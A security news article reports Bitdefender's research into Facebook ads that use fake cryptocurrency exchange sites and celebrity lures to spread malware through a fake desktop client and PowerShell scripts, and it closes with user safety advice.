Fake Crypto Exchange Ads on Facebook Spread Malware

Bitdefender exposes Facebook ad scams using fake crypto sites and celebrity lures to spread malware via malicious desktop clients and PowerShell scripts.

A persistent malware campaign is exploiting Facebook’s advertising network to target cryptocurrency enthusiasts, security researchers at Bitdefender revealed today.

The operation leverages the trusted names of major cryptocurrency exchanges like Binance and TradingView, and images of celebrities such as Elon Musk and Zendaya in Facebook ads to lend credibility to the fake cryptocurrency exchange promotions and lure unsuspecting users into downloading malicious software.

Bitdefender’s investigation, shared with Hackread.com ahead of its publishing, found a multi-layered attack that delivers malware through a covert communication channel between the website and the victim’s own computer.

According to researchers, cybercriminals are hijacking Facebook accounts or creating fake ones to run deceptive ads promising quick financial gains or crypto bonuses. Clicking these ads redirects victims to convincing but fraudulent websites that mimic legitimate cryptocurrency platforms, urging them to download a “desktop client.”

When downloaded, the desktop client drops a malicious DLL file, which launches a local .NET-based server on the victim’s machine. This server acts as a hidden C2 centre. The fake website’s front end contains a deobfuscated script that communicates with the server, sends WMI (Windows Management Instrumentation) queries, and instructs it to execute further malicious payloads.

The final stage often involves the execution of multiple encoded PowerShell scripts, which download additional malware from remote servers. Furthermore, the attackers implement advanced anti-sandbox checks, ensuring that the malware is only delivered to users who meet specific demographic and behavioural profiles deemed valuable by the cybercriminals.

Bitdefender researcher Ionut Baltariu highlighted that users without specific Facebook ad tracking parameters, those not logged into Facebook, or those with uninteresting IP addresses or operating systems are also shown harmless content instead. This targeted approach allows the attackers to maximize their impact while minimizing exposure to security analysis.

The scale of the operation is significant as researchers have identified hundreds of Facebook accounts actively promoting these malicious pages. In one case, a single page ran over 100 ads in just 24 hours.

While Facebook often removes these fraudulent ads, many gather thousands of views before being taken down. The targeting is often finely tuned, with one instance focusing on men aged 18 and over in Bulgaria and Slovakia.

Adding another layer of deception, the attackers have even created fake Facebook pages that perfectly mirror the official pages of platforms like TradingView, complete with fabricated posts and comments touting fake giveaways. However, the links embedded in these fake pages lead directly to the malware-distributing websites.

Facebook’s continued role as a vector for malware distribution is hard to overlook as earlier findings, including today’s discovery from Morphisec which shows cybercriminals have been using deceptive Facebook ads promoting fake AI platforms to distribute the new Noodlophile Stealer.

It also shows how cybercriminals exploit the platform’s reach and advertising capabilities for malicious purposes, emphasizing the need for user vigilance and platform security enhancements.

Bitdefender advises users to be cautious of online ads, use scam and link-checking tools, keep security software updated and report suspicious ads on Facebook to stay protected.